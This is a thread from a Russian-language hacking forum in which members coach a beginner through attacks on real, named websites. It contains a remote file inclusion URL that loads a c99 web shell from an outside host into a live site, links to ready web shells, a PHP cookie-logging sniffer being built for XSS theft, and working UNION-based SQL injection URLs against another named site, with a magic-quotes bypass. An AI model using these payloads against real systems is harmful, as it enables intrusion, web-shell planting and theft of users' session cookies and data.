Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    странный чел - а где расширение файла? А что там внутри - мне гадать надо?:))

    вот нормальный, рабочий шелл

    https://forum.antichat.ru/thread125103.html

    заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать)

    PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ты не так ввел)))надо так http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.txt

    что бы в конце было не пхп а тхт

    P.S. пл* у кого корявblе сообщение что аш раздуваются посты ))))

    если не понял то стукани в асю
     
    _________________________
    #7562 HAXTA4OK, 15 Jun 2009
    Last edited: 15 Jun 2009
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://pashkela.narod.ru/progi/MySql4Bruter.rar - брутер mysql4
    
    http://pashkela.narod.ru/progi/MySQL_column.rar -  подбор кол-ва колонок
    
    не всегда пашут, т.к. нет замены /**/ на просто пробел или плюс и прочее. Readme в комплекте
     
    1 person likes this.
  4. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Pashkela, спб за софт, но я так понял, что прога для поиска количесвта колнок подбирает только лишь принтабельный столбец, а сами колонки она игнорирует....)
     
  5. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Народ я умею проводить SQL-inj Но не умею PHP
    ПОдскажите можно ли тут что-то сделать
    ССылка вида
    http://www.сайт.ru/index.php?p=about'
     
  6. main()

    main() Banned

    Joined:
    10 Jun 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    1
    pashkelka,haxtachak спасибо что разъяснили. Я нашол в нете shell c99. залил на народ и запустил. первый раз ничего не отбразилось. 2 раз когда подрдактировал

    $surl = "http://catenabrasil.com/portal/index.php?arq="; //link to this script, INCLUDE "?".

    чтото появилось, но работает очень жопно.
    вот взгляните:

    [​IMG]

    и при попытке открыть что либо выскакивает эта шняга.



    Warning: include_once(act=ls) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69

    Warning: include_once() [function.include]: Failed opening 'act=ls' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69

    PS обясните плиз новичку. я первый раз делаю такое
    модет кто даст линки на более простые шеллы и описание их конфига?
     
    #7566 main(), 15 Jun 2009
    Last edited: 15 Jun 2009
    1 person likes this.
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Дружище, я смотрю вчерашняя беседа прошла даром.
    Вот код из скрипта:
    PHP:
    <? 
                    
    $arq $_REQUEST["arq"]; 
                     
            if ((isset(
    $arq)) and ($arq != "")){ 
                        include_once(
    $arq); 
                    } 
                    elseif (isset(
    $_POST['keyGen'])){ 
                      include_once(
    $arq); 
                    } 
                    else { 
                        include_once(
    'empresa.php'); 
                    } 
                
    ?>
    ЭТО ИНКЛУД!!! И ему абсолютно пофигу какое расширение и есть ли оно вообще. И уж тем-более на народе.

    ЗЫ Только не надо мне рассказывать , что при инклуде .php он исполнится на стороне того сервера, (я это как-бэ знаю). Народ это не тот случай, и не путай новичка пожалуйста
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 jokester:

    Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"

    Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php

    Проверь плиз, может я ваще после выходных с катушек съехал:))

    PS: А, дошло, если с99 запороленный - то фиг, wso2 пофигу, поэтому так и подумал

    В общем jokester прав как всегда:))

    загвоздка была в том, чтобы с99 не был запороленный
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Отлично всё работает
     
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    jokester ..у меня тоже такая фигня была....но чем не факт сделать тхт? :) если получилось , работает)то смысл судить
     
    _________________________
  11. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    дабы не путать новичков и не создавать ложных предрасудков и стереотипов
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    HAXTA4OK

    Я уже несколько раз говорил, в чём разница. От непонимания возникают новые вопросы. Сделать тупо как показали, не поняв как это работает, это не выход. Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы
     
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    и вот ты думаешь что он понял что все ему написали? он просто по примеру сделал с тхт...дык и пусть потом пробует так!. а вот если не получится то спросит..а щас ему тут все понапишут и он вообще не поймет и бросит(не факт)
    P.S. он хоть с тхт понял)))) так и пусть делает так



    ####################################
    jokester

    Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы

    и вот ты думаешь что он понял что все ему написали?


    P.S.пусть идет по ступенькам на примерах :)
    ##################################
    main()

    на тебе шелл ..позаимствовал у mailbrush _http://bestquest.info/shell.txt
     
    _________________________
    #7573 HAXTA4OK, 15 Jun 2009
    Last edited: 15 Jun 2009
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это от меднета шелл, не от меня :)
     
  15. main()

    main() Banned

    Joined:
    10 Jun 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    1
    Люди помогите плиз. Надо написать самый примитивный снифире XSS на php. читал статью
    на ачате про XSS но снифер там какойто мудрённый, с шифрованием,с картинкой и т.д. надо простой сниф и всё может кто накатает. я вот накатал чтото похожее

    PHP:
    <?php
    $file
    ="log.txt";
    $data=date("d.m.Y");
    $time=date("H.i");

    $ip=trim($_SERVER['REMOTE_ADDR']);
    $agent=trim($_SERVER['HTTP_USER_AGENT']);


        
    $fo=fopen($file,"a");
        
    $res="$data|$time|$ip|$agent";
        
    $fw=fputs($fo,$res);
        
    fclose($fo);
    ?>
    но как ему передать куки этому скрипту?
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер - картинка - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить.

    PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html
     
    #7576 mailbrush, 15 Jun 2009
    Last edited: 15 Jun 2009
    1 person likes this.
  17. main()

    main() Banned

    Joined:
    10 Jun 2009
    Messages:
    7
    Likes Received:
    2
    Reputations:
    1
    Помоги плиз изминитиь тот скрипт чтобы он через
    QUERY_STRING записывал в файл. и составить url на багу. помогите плиз
     
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log
    http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+where+table_schema=%27rocit%27--

    но ничего хорошего я не вижу.....
     
  19. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+where+table_schema=0x726f636974--
    мэджики включены
     
Thread Status:
Not open for further replies.